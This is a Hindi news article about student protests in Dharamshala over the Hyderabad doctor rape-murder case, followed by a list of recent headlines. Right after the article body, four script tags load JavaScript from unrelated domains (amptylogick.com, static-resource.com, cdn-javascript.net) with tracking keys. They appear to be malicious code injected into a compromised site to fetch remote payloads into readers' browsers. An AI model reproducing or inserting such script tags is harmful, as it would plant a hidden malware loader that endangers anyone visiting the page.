Categories: हिमाचल

धर्मशाला में ABVP ने हैदराबाद डॉक्टर रेप मामले पर किया धरना प्रदर्शन

<p>हैदराबाद में डॉक्टर रेप मामले के आक्रोश की ज्वाला अब हिमाचल में भी पहुंच चुकी है। बीते बुधवार को हैदराबाद में लेडी डॉक्टर की हत्या के मामले को लेकर इस वक्त समूचे देश में आक्रोश की लहर है। धर्मशाला के शैक्षणिक संस्थानों के छात्रों ने भी अब प्रियंका के इंसाफ के लिए अपनी आवाज़ बुलंद कर दी है और हत्यारों की जल्द से जल्द गिरफ्तारी की मांग की है। डिग्री कॉलेज़ धर्मशाला और सेंट्रल युनिवर्सिटी कैंपस में अखिल भारतीय विद्यार्थी परिषद ने लेडी डॉक्टर प्रियंका को इंसाफ दिलाने की मांग की है। छात्रों ने इसके लिए बाकायदा रैली भी निकाली और हैदराबाद में लॉ एंड ऑर्डर पर भी सवाल खड़े किए हैं।</p>

<p>बता दें कि साइबराबाद पुलिस ने बुधवार को 27 साल की डॉक्टर युवती के साथ सामूहिक दुष्कर्म और हत्या के मामले में शुक्रवार को चार संदिग्धों को गिरफ्तार किया था। हिरासत में लिए गए लोगों में एक ट्रक ड्राइवर और एक क्लीनर शामिल हैं। पुलिस को अंदेशा है कि आरोपियों ने युवती लड़की के साथ सामूहिक दुष्कर्म किया और बाद में गला घोंटकर उसकी हत्या कर दी और शव को जला दिया।</p>

<p>जानकारी अनुसार चार हैवानों&nbsp; ने बुधवार की एक महिला के साथ रेप कर उसे जिंदा जला दिया गया। महिला डॉक्टर जब क्लीनिक से घर स्कूटी पर आ रही थी, तब उसकी स्कूटी का टायर पंचर हो गया। शाम छह बजे पीड़िता को अपना दोपहिया वाहन शमशाबाद के तोंदुपल्ली टोलगेट में पार्क करते हुए देखा था तब उसी समय चारों ने अपराध करने की योजना बनाई अपनी योजना के अनुसार उन्होंने जानबूझकर पीड़िता की स्कूटी के पिछले टायर से हवा निकाल दी और उस समय सभी आरोपी नशे में थे। शव को सरकारी अस्पताल में पोस्टमोर्टम के लिए भेजा दिया है। पुलिस सीसीटीवी फुटेज भी खंगाल रही है और मामला दर्ज&nbsp; कर लिया है। जिसके बाद से देश भर में आक्रोश का माहौल है।</p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1575100586726″ type=”text/javascript”></script>
<script src=”http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

Baba Siddique Murder Case: बोन टेस्ट में खुलासा, आरोपी धर्मराज कश्यप नाबालिग नहीं

Mumbai:  महाराष्ट्र के पूर्व मंत्री और राष्ट्रवादी कांग्रेस पार्टी (राकांपा) नेता बाबा सिद्दीकी की हत्या…

12 mins ago

16 अक्टूबर को मनाएं शरद पूर्णिमा, जानें पूजा विधि और व्रत के लाभ

Sharad Purnima Vrat 2024:  हिंदू धर्म में आश्विन मास की शुक्ल पक्ष की चतुर्दशी को…

22 mins ago

National : 10+2 पास युवाओं के लिए सेना में अफसर बनने का मौका, आवेदन शुरू

Indian Army TES 53 Recruitment: भारतीय सेना में अफसर बनने का सपना देखने वाले युवाओं…

33 mins ago

14 अक्टूबर 2024, जानें कैसा रहेगा सोमवार

मेष (Aries) आज का दिन आपके लिए लाभकारी रहेगा। बिजनेस में फायदे की संभावना है,…

47 mins ago

भारत में सड़क दुर्घटनाओं को रोकने के लिए केंद्रीय कानून जरूरी: शांता कुमार

Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…

12 hours ago

Himachal: सीएम सुक्खू ने ईवीएम पर उठाए सवाल, बैलेट पेपर से चुनाव की मांग

Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…

13 hours ago